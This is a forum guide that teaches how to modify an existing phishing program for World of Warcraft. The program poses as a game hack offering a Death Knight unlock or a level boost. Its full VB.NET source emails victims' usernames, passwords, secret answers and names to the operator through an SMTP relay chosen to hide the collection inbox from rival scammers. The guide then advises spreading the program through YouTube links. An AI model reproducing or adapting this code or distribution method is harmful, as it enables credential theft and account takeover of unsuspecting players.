Okay, this is my first attempt at a guide so beware.
My opinion of difficulty: [XXX--]
Reason: Simple concept, somewhat difficult to execute.
This guide assumes:
A) You have basic knowledge of Visual Basic and have access to it (or Visual Studio).
B) You are familiar with how these phisher programs work.
C) You are familiar with how email relaying/smtp servers work.
1. Basic Idea/How things normally work:
The basic idea of doing this is to prevent http://www.mmowned.com/forums/wow-sc...g-youtube.html from happening to you. Basically, the way that the ShAnX and most application (program.exe) phishers are written is to send an email through GMail's smtp server. The super-basic way of doing this is sending an email from the account to the same account. Enhanced security would mean sending the email to a different account than the gmail account but if someone were to gain access, they just need to check your Sent emails folder/change the password and you're screwed.
2. What's the point and what's the process?
Well, you spent all this time making an awesome phisher and stuff, you don't want to ruin it because some leecher here read the above guide and is, well, leeching off all your hard work. Now the process is simple, using an email relayer that DOES NOT have web-mail access to send the email to a DIFFERENT address. Simple. Here's a diagram for those that are lost:
Normal Way:
User presses activate in phisher -> phisher logs into smtp.google.com with username/password -> phisher sends email to address in code -> email account receives email
The problem (if you skipped the above portion) is that by using GMail, people can reverse engineer the username/password of the account from the program. They check sent messages and there's all your phised accounts. Or, they change the password and you no more phished accounts.
Safer Way:
User presses activate in phisher -> phisher logs into smtp.xxx.com with (possibly without) username/password (using an account that DOES NOT have web access) -> phisher sends email to address in code -> email is forwarded to separate account address -> separate email account receives email
Using this method, since there is no webmail access for the forwarding account (smtp.xxx.com), that username/password is useless. The worst they could do is report the address for abuse but, more often than not, they will give up.
3. How is it done?
It has been broken down into steps for ease of use.
3.a Find an email relaying/forwarding service.
This is the hardest part. There's a lot you can do. If you pay for webhosting (like I do) more than likely, you can make email mailboxes/forwarding. This is what I do. A domain that I have doesn't have any way to login to the email account and that's the one I use. I **might** help some of those out who have trouble with this part. If you're a leecher/low-on-the-totem-pole, please don't expect anything. PM me otherwise.
3.b Setup an account on a webmail server (Yahoo, GMail, aol, etc...).
I use Yahoo, you can use whatever you want. HINT: use different passwords for EVERY account!! You should know better but for those who don't, I'm laying it out for ya.
3.c Edit the code.
Now, this step is completely dependent of what Phisher you use. I use ShAnX. Download one of his releases and then open the VBProject file (if this all sounds foreign to you, then check out http://www.mmowned.com/forums/wow-sc...er-v1-5-a.html). Double click Form2 and then double click the "Activate" button to bring up the code for the button. This is what you will see:
Code:
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim WC As New System.Net.WebClient
Dim MyMailMessage As New MailMessage
MyMailMessage.From = New MailAddress("[email protected]")
MyMailMessage.To.Add("[email protected]")
MyMailMessage.Subject = (TextBox1.Text & " - " & "Their IP is: " & System.Text.Encoding.ASCII.GetString((WC.DownloadData("http://whatismyip.com/automation/n09230945.asp"))))
WC.Dispose()
MyMailMessage.Body = (" 1.) Username: " & TextBox1.Text & " 2.) Password: " & TextBox6.Text & " 3.) Secret Answer: " & TextBox2.Text & " 4.) Email " & TextBox3.Text & " 5.) First Name: " & TextBox4.Text & " 6.) Last Name: " & TextBox5.Text & " ****A ShAnX Program****")
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential("Email Here", "Pass here")
SMTPServer.EnableSsl = True
Try
SMTPServer.Send(MyMailMessage)
Catch ex As SmtpException
MessageBox.Show(ex.Message)
End Try
If TextBox1.Text = "" Then
MsgBox("Please enter the required fields")
End If
Me.Close()
Form1.Close()
If TextBox1.Text <> "" Then
MsgBox("Hack Complete: You will be able to made a Death Knight (DK) on any realm within 3 hours")
End If
Okay, I'm not going to explain what all of that does. I'm just going to paste the new code below. Please note that I've modified the code slightly as I don't care what their IP is, and the workflow was a little odd. The way that I have it set up *SHOULD* prevent you from getting blank emails. I also took out some of the proper code formatting (spacing, etc...) Just trust me.
Code:
If TextBox1.Text = "" Then
MsgBox("Please enter the required fields")
End If
Dim MyMailMessage As New MailMessage()
Dim SMTPServer As New SmtpClient("smtp.xxx.com")
Dim SMTPServerUser As New System.Net.NetworkCredential()
MyMailMessage.From = New MailAddress("[email protected]")
MyMailMessage.To.Add("[email protected]")
MyMailMessage.IsBodyHtml = False
MyMailMessage.Subject = (TextBox1.Text & " - " & "Their Password is: " & TextBox6.Text)
' WC.Dispose()
MyMailMessage.Body = (" 1.) Username: " & TextBox1.Text & " 2.) Password: " & TextBox6.Text & " 3.) Secret Answer: " & TextBox2.Text & " 4.) Email " & TextBox3.Text & " 5.) First Name: " & TextBox4.Text & " 6.) Last Name: " & TextBox5.Text & " ****A ShAnX Program****")
' Try
SMTPServer.EnableSsl = False
SMTPServer.UseDefaultCredentials = False
SMTPServer.Credentials = New System.Net.NetworkCredential("[email protected]", "your_password")
SMTPServer.Host = "smtp.xxx.com"
SMTPServer.DeliveryMethod = SmtpDeliveryMethod.Network
SMTPServer.Send(MyMailMessage)
' Catch ex As SmtpException
' MessageBox.Show(ex.Message)
' End Try
If TextBox1.Text <> "" Then
MsgBox("Hack Complete: " & TextBox7.Text & "'s Level should have been changed to 80. If you login and it hasn't, some of the information you entered was invalid. Enjoy!")
End If
End
You can see here that I've made it so that if the account text box is empty, then it won't send an email. After that, it creates the email, and sends it to a DIFFERENT account than the one used for relaying.
3.d What YOU need to change.
First, you need to change
Code:
Dim SMTPServer As New SmtpClient ("smtp.xxx.com")
to the SMTP server your relaying account uses. Ex: ("smtp.email-relay.com")
Next, change
to the email address on the relaying server. Ex: ("[email protected]")
Next,
to your final destination email account (Yahoo, GMail, etc...). This address will be the one you check the accounts for. Ex: ("[email protected]")
Next,
Code:
SMTPServer.Credentials = New System.Net.NetworkCredential("[email protected]", "your_password")
to your relaying account and password. Ex: ("[email protected]", "imapassword123")
Finally, change
Code:
SMTPServer.Host = "smtp.xxx.com"
to the SMTP server you set earlier. Ex: ("smtp.email-relay.com")
4. Test it all out. If you have errors, you did something wrong. The most common problem I encountered was an error that was something like "Unauthenticated relaying is forbidden." The order of the code should fix this error but I'm not 100% on that. I will attempt to help people as much as possible but I can only do so much.
5. Upload the program to a hosting service then attach the link to your YouTube video and you should be all set.